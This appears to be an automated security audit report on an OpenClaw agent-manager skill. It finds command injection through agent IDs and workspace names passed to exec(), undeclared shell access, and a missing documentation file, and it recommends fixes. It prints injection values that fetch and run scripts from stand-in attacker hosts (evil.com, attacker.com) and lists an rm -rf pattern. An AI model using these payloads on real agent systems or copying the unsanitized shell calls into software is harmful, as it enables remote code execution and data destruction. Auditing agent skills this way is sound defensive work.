Skill Trust Decision
colmena-manager
Skill presents as a legitimate OpenClaw agent manager but contains multiple command-injection vulnerabilities from unsanitized user-controlled input piped into shell commands, with shell execution entirely undeclared in documentation.
Most direct threat evidence
01
Attacker registers a malicious agent with shell metacharacters in the ID (e.g., 'vision; wget http://evil.com/sh.sh|bash') reconnaissance · src/index.js
02
Victim runs 'colmena-manager health-check' to monitor the hive Entry · src/index.js
03
healthCheck() calls exec() with ps aux | grep ${agent.id}, where agent.id contains un-sanitized shell metacharacters from step 1 Escalation · src/index.js
Why this conclusion was reached
3/4 dimensions flagged Block
Declared vs actual capability
2 undeclared or violating capabilities were inferred.
Block
Hidden execution and egress
1 high-risk artifacts or egress signals were extracted.
Block
Attack chain and severe findings
The report includes 4 attack-chain steps and 3 severe findings.
Pass
Dependencies and supply chain hygiene
Dependencies are present but no obvious high-risk issue stands out.
Attack Chain
01
Attacker registers a malicious agent with shell metacharacters in the ID (e.g., 'vision; wget http://evil.com/sh.sh|bash')
reconnaissance · src/index.js:12
02
Victim runs 'colmena-manager health-check' to monitor the hive
Entry · src/index.js:120
03
healthCheck() calls exec() with ps aux | grep ${agent.id}, where agent.id contains un-sanitized shell metacharacters from step 1
Escalation · src/index.js:131
04
Shell injection executes arbitrary commands (download + execute remote script) with the permissions of the running user
Impact · src/index.js:131
What drove the risk score up
Undeclared shell execution +15
SKILL.md describes only OpenClaw API calls (agents_list, sessions_list, sessions_send) but never mentions exec() shell commands used throughout src/index.js
Command injection — agentId +15
agentId from API responses is interpolated into shell commands in logs() (line 66), healthCheck() (line 131), and checkMemory() (line 162) without sanitization
Command injection — workspace name +10
workspace name (user-controlled CLI argument) is directly interpolated into rm -rf command in workspaceRemove() (line 193); path traversal possible
Missing allowed-tools declaration +5
Neither SKILL.md nor claws.json declares shell:WRITE or filesystem:WRITE permissions required by the exec() calls
Hardcoded user path dependency +3
All paths hardcoded to /home/nvi/ — a specific user account not mentioned as a prerequisite
Non-existent HEARTBEAT.md referenced +2
SKILL.md advertises HEARTBEAT.md for automatic 30-min health checks but the file does not exist in the project
Most important evidence
High RCE
Command injection via agentId in multiple exec() calls
The agentId parameter (sourced from the agents_list API response) is directly interpolated into shell commands via template literals in three separate locations: logs() at line 66, healthCheck() at line 131, and checkMemory() at line 162. An attacker who registers a malicious agent with shell metacharacters in the ID (e.g., 'main; curl http://attacker.com') can achieve arbitrary command execution on the host when any of these commands are invoked.
src/index.js:66 Validate agentId against a strict alphanumeric/whitelist pattern before using in any shell command. Use OpenClaw's native session API instead of shell tail for log retrieval.
High RCE
Command injection via workspace name in rm -rf
The workspace name argument passed to workspaceRemove() is directly interpolated into an rm -rf shell command without sanitization. While the base path /home/nvi/.openclaw/workspace- provides some containment, path traversal sequences like '../../../' could escape the intended directory and delete arbitrary files on the system as the executing user.
src/index.js:193 Validate workspace name against a strict pattern (e.g., /^[a-z0-9-]+$/). Use Node.js fs.rmSync() with a verified absolute path instead of shell rm. Add a confirmation prompt before destructive operations.
High Doc Mismatch
Shell execution completely absent from SKILL.md
SKILL.md's API section lists only OpenClaw native functions (agents_list, sessions_list, sessions_send, message, exec/process). It never discloses that exec() is used to run arbitrary shell commands (tail, ps, grep, awk, ls, mkdir, rm). Users deploying this skill have no indication it requires shell:WRITE permissions or executes system commands.
SKILL.md:55 SKILL.md must explicitly declare shell:WRITE permission and list each shell command used. Users must give informed consent before a skill can execute system commands.
Medium Doc Mismatch
Referenced HEARTBEAT.md does not exist
SKILL.md advertises an automatic heartbeat script (HEARTBEAT.md) that runs every 30 minutes for health monitoring. This file is referenced in both SKILL.md and README.md but does not exist in the project. This is either an incomplete feature or documentation that overstates capabilities.
SKILL.md:64 Either implement HEARTBEAT.md or remove all references to it from documentation. If implemented, declare its resource requirements explicitly.
Medium Priv Escalation
No allowed-tools declaration despite full shell/filesystem access
claws.json and SKILL.md do not declare any allowed-tools. The skill uses exec() for shell:WRITE operations (tail, ps, grep, awk, ls, mkdir, rm) and filesystem:WRITE operations (mkdir, rm -rf) across multiple methods. These permissions are entirely absent from any manifest, preventing the host AI from properly scoping the skill's capabilities.
claws.json:1 Add an allowed-tools declaration to claws.json: {"tools": [{"name": "Bash", "resource": "shell", "level": "WRITE"}, {"name": "Write", "resource": "filesystem", "level": "WRITE"}]}
Low Sensitive Access
Hardcoded /home/nvi/ path creates dependency on specific user account
All file operations (logs, workspaces) hardcode /home/nvi/ as the base path. This is not declared as a prerequisite, and the path does not appear in SKILL.md requirements. The skill will silently fail on systems where this user does not exist.
src/index.js:66 Derive the OpenClaw data directory from an environment variable (e.g., OPENCLAW_HOME or XDG_DATA_HOME) or make it a configurable parameter.
Declared capability vs actual capability
Shell Block
Declared NONE
→ Inferred WRITE
src/index.js:66 exec with tail | src/index.js:131 exec with ps|grep | src/index.js:162 exec with ps|grep|awk | src/index.js:193 exec with rm Filesystem Block
Declared NONE
→ Inferred WRITE
src/index.js:188 mkdir via exec | src/index.js:193 rm -rf via exec Skill Invoke Pass
Declared NONE
→ Inferred READ
src/index.js:13 agents_list, sessions_list, sessions_send — matches SKILL.md API section Suspicious artifacts and egress
Critical Dangerous Command
rm -rf / src/index.js:193
Medium External URL
https://clawhub.com/colmena-manager claws.json:15
Dependencies and supply chain
| Package | Version | Source | Known vuln | Notes |
|---|---|---|---|---|
| openclaw | >=1.0.0 | npm (peer dep) | No | Peer dependency, not bundled. No known vulnerabilities. |
File composition
5 files · 552 lines
JavaScript 1 files · 289 linesMarkdown 2 files · 211 linesJSON 2 files · 52 lines
Files of concern · 3
src/index.js Command injection via agentId in multiple exec() calls · Command injection via workspace name in rm -rf · Hardcoded /home/nvi/ path creates dependency on specific user account · rm -rf /
SKILL.md Shell execution completely absent from SKILL.md · Referenced HEARTBEAT.md does not exist
claws.json No allowed-tools declaration despite full shell/filesystem access · https://clawhub.com/colmena-manager · [email protected]
Other files · README.md · package.json
Security positives
Skill implements its stated functionality (agent management) without additional hidden data exfiltration
No base64-encoded payloads or obfuscated code blocks found
No credential harvesting from ~/.ssh, ~/.aws, or .env files
No network requests to external IPs detected
No reverse shell, C2, or data theft mechanisms present
No cron/scheduled task persistence mechanisms found
No malicious dependencies detected; package.json has minimal legitimate dependencies